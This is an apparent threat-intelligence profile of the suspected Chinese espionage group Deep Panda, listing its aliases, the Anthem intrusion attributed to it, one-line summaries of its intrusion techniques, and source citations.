Group: Deep Panda, Shell Crew, ...
|Deep Panda, Shell Crew, ...|
|Aliases||Deep Panda, Shell Crew, WebMasters, KungFu Kittens, PinkPanther, Black Vine|
Deep Panda is a suspected Chinese threat group known to target many industries, including government, defense, financial, and telecommunications.1 The intrusion into healthcare company Anthem has been attributed to Deep Panda.2 This group is also known as Shell Crew, WebMasters, KungFu Kittens, and PinkPanther.3 Deep Panda also appears to be known as Black Vine based on the attribution of both group names to the Anthem intrusion.4
- PowerShell - Deep Panda has used PowerShell scripts to download and execute programs in memory, without writing to disk.1
- Windows Management Instrumentation - The Deep Panda group is known to utilize WMI for lateral movement.1
- Web Shell - Deep Panda uses Web shells on publicly accessible Web servers to access victim networks.5
- Windows Admin Shares - Deep Panda uses net.exe to connect to network shares using
net usecommands with compromised credentials.1
- Process Discovery - Deep Panda uses the Microsoft Tasklist utility to list processes running on systems.1
- Scripting - Deep Panda has used PowerShell scripts to download and execute programs in memory, without writing to disk.1
- Indicator Removal from Tools - Deep Panda has updated and modified its malware, resulting in different hash values that evade detection.4
- Regsvr32 - Deep Panda has used regsvr32.exe to execute a server variant of Derusbi in victim networks.3
- Accessibility Features - Deep Panda has used the sticky-keys technique to bypass the RDP login screen on remote systems during intrusions.3
- Alperovitch, D. (2014, July 7). Deep in Thought: Chinese Targeting of National Security Think Tanks. Retrieved November 12, 2014.
- ThreatConnect Research Team. (2015, February 27). The Anthem Hack: All Roads Lead to China. Retrieved January 26, 2016.
- RSA Incident Response. (2014, January). RSA Incident Response Emerging Threat Profile: Shell Crew. Retrieved January 14, 2016.
- DiMaggio, J.. (2015, August 6). The Black Vine cyberespionage group. Retrieved January 26, 2016.
- RYANJ. (2014, February 20). Mo’ Shells Mo’ Problems – Deep Panda Web Shells. Retrieved September 16, 2015.
- Cylance SPEAR Team. (2017, February 9). Shell Crew Variants Continue to Fly Under Big AV’s Radar. Retrieved February 15, 2017.